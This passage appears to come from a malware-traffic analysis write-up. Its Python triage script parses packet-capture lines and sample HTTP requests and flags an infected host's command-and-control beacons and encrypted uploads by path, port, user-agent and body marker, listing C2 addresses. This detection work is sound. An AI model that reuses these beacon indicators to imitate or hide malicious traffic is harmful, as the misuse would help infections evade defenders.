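802 795.966247 192.168.7.84 180.235.150.72 TCP saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
803 796.070637 180.235.150.72 192.168.7.84 TCP http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
192.168.7.84 74.207.237.170 TCP danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
"""


def _req(*headers, body):
    """Build a raw HTTP request from header lines plus a body."""
    return "\r\n".join(headers).encode("latin-1") + b"\r\n\r\n" + body


SAMPLE_REQUESTS = [
    # take 1, peer beacon to 74.207.237.170:8080; first 4 body bytes from the hex dump, rest constructed
    _req("POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1", "Accept: */*", "User-Agent: " + BEACON_UA,
         "Host: 74.207.237.170:8080", "Content-Length: 347", "Connection: Keep-Alive",
         "Cache-Control: no-cache", body=b"\x2e\xd7\xf7\xa7" + b"\x00" * 343),
    # take 1, the second server; body starts with the literal marker, rest constructed
    _req("POST /asp/intro.php HTTP/1.0", "Host: 203.113.98.131", "Accept: */*",
         "Accept-Encoding: identity, *;q=0", "Content-Length: 257", "Connection: close",
         "Content-Type: application/octet-stream", "Content-Encoding: binary",
         "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)", body=UPLOAD_MARKER + b"\x00" * 249),
    # take 2, peer beacon to 123.49.61.59:8080 (constructed body)
    _req("POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1", "Accept: */*", "User-Agent: " + BEACON_UA,
         "Host: 123.49.61.59:8080", "Content-Length: 387", "Connection: Keep-Alive",
         "Cache-Control: no-cache", body=b"\x00" * 387),
    # constructed control case: same User-Agent but an ordinary path and port; must not match
    _req("POST /index.php HTTP/1.1", "User-Agent: " + BEACON_UA, "Host: 192.0.2.10",
         "Content-Length: 0", body=b""),
]

SUMMARY_RE = re.compile(
    r"^(?:\d+\s+[\d.]+\s+)?(?P<src>[\d.]+)\s+(?P<dst>[\d.]+)\s+TCP\s+"
    r"(?P<sport>\S+) > (?P<dport>\S+) \[(?P<flags>[^\]]+)\]")


def peer_status(summary_text, host=INFECTED_HOST):
    """Per remote address: 'refused' = our SYN to 80/8080 got RST/ACK back,
    'reset-by-host' = we sent the RST, 'syn-sent' = no answer in these lines."""
    status = {}
    for line in summary_text.splitlines():
        m = SUMMARY_RE.match(line.strip())
        if not m:
            continue
        src, dst, sport, dport = m.group("src", "dst", "sport", "dport")
        flags = {f.strip() for f in m.group("flags").split(",")}
        if src == host and dport in SERVICE_PORTS:
            if "SYN" in flags:
                status.setdefault(dst, "syn-sent")
            elif "RST" in flags:
                status[dst] = "reset-by-host"
        elif dst == host and sport in SERVICE_PORTS and {"RST", "ACK"} <= flags:
            if status.get(src) == "syn-sent":
                status[src] = "refused"
    return status


def parse_request(raw):
    """Split a raw request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    host, _, port = headers.get("host", "").partition(":")
    return {"method": method, "path": path, "host": host,
            "port": int(port) if port else 80, "headers": headers, "body": body}


def classify(req):
    """Return (host, port, verdict, length_ok); length_ok flags a truncated body."""
    length_ok = int(req["headers"].get("content-length", "0")) == len(req["body"])
    if (req["method"] == "POST" and req["path"] == BEACON_PATH and req["port"] == 8080
            and req["headers"].get("user-agent") == BEACON_UA):
        verdict = "peer-beacon"
    elif req["method"] == "POST" and req["path"] == UPLOAD_PATH and req["body"].startswith(UPLOAD_MARKER):
        verdict = "crypted-upload"
    else:
        verdict = "unclassified"
    return req["host"], req["port"], verdict, length_ok


def triage(summary_text=SUMMARY_LINES, requests=SAMPLE_REQUESTS, host=INFECTED_HOST):
    peers = peer_status(summary_text, host)
    verdicts = [classify(parse_request(r)) for r in requests]
    return {"peers": peers, "verdicts": verdicts,
            "answering_c2": sorted({h for h, _p, v, _ok in verdicts if v != "unclassified"}),
            "dead_peers": sorted(a for a, s in peers.items() if s == "refused")}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

The Content-Length check is there because a body shorter than declared is the normal sign that the capture, or a transcription of it, cut the request; a classifier that keys on body bytes should know when it is looking at a truncated blob rather than at the real message.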